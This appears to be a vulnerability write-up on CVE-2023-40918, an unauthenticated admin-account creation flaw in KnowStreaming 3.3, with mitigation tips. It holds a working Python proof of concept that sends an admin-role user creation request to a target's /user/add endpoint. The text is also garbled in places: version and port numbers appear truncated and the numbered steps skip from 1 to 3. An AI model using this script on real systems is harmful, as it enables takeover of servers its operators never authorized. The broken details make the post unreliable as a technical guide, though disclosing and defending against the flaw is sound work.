CVE-2023-40918 - KnowStreaming 3.3. Privilege Escalation – How Attackers Get Admin Access (with Proof of Concept)

KnowStreaming is an open-source distributed data platform that’s getting a lot of buzz in the world of real-time data processing. But recently, researchers discovered a dangerous vulnerability in KnowStreaming 3.3.: an unauthorized user can create an admin account, giving them the keys to the kingdom.

This post breaks down CVE-2023-40918, showing how the bug works, proof-of-concept code, and how attackers could use it. We also link to trusted sources, so you can read even further.

What Is the Vulnerability (CVE-2023-40918)?

In KnowStreaming version 3.3., the user management system doesn’t check for authentication—or doesn’t check carefully enough—when handling new user creation. This means anyone, even people not logged in, can send specific API requests to create a new account with any role, including "admin".

If this sounds bad, that’s because it’s very bad! With an admin account, attackers can see all data, change configurations, access sensitive settings, and basically take control of the whole KnowStreaming setup.

Original references

- NVD Entry for CVE-2023-40918
- KnowStreaming Source - GitHub

How the Exploit Works

Attackers just send a direct HTTP POST request to the /user API endpoint, specifying both the username and the "role" as "admin". There are no checks to see if this requester is authorized.

Step-by-step

1. Discover or guess the endpoint (for example, /api/v1/user or /user/add).

Proof of Concept (Python)

Here’s a quick proof-of-concept using Python’s requests library. All you need is the URL to the KnowStreaming API (default is often http://target:808):

import requests

url = 'http://target:808/user/add'  # Change to your target's address

payload = {
    "username": "eviladmin",
    "password": "VeryStrongP@sswrd",
    "role": "admin"
}

resp = requests.post(url, json=payload)

if resp.status_code == 200:
    print("Success! Created admin account eviladmin.")
else:
    print(f"Exploit failed. Status: {resp.status_code}")
    print(resp.text)

A real attacker could now log in with eviladmin and the set password.

Some installations may use /api/v1/user or similar. Check the documentation or look at the JS code in your browser’s network panel to be sure.

Monitor for unexpected new users, especially admins.

3. Upgrade to a patched version as soon as one is available. At the time of writing, check KnowStreaming GitHub Issues for patches or mitigation tips.

Temporary workaround:
If you must keep using version 3.3., consider adding application-layer firewalls or reverse proxies that only allow trusted IPs to access management endpoints.

Extra Reading & Resources

- CVE-2023-40918 on NIST NVD
- KnowStreaming Releases (GitHub)
- KnowStreaming User Issues Thread

Final Thoughts

CVE-2023-40918 is a wake-up call. Always lock down admin panels, keep software updated, and monitor open source projects you use for new vulnerabilities.

If you discover a new admin you didn’t create, update *immediately* and treat your server as potentially compromised.

Timeline

Published on: 09/05/2023 18:15:11 UTC
Last modified on: 09/08/2023 14:26:06 UTC